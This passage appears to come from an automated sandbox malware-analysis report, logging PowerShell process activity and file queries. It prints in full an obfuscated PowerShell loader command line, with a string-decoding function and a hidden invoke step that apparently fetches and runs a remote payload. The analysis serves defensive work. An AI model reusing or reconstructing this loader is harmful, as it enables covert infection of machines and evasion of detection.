ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcordinuhiplir systep.pulshy Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf 
');unschool (udvindende ' ustk$teh ng ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcor Jump to behavior
Source: AutoIt3_x64.exe.8.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation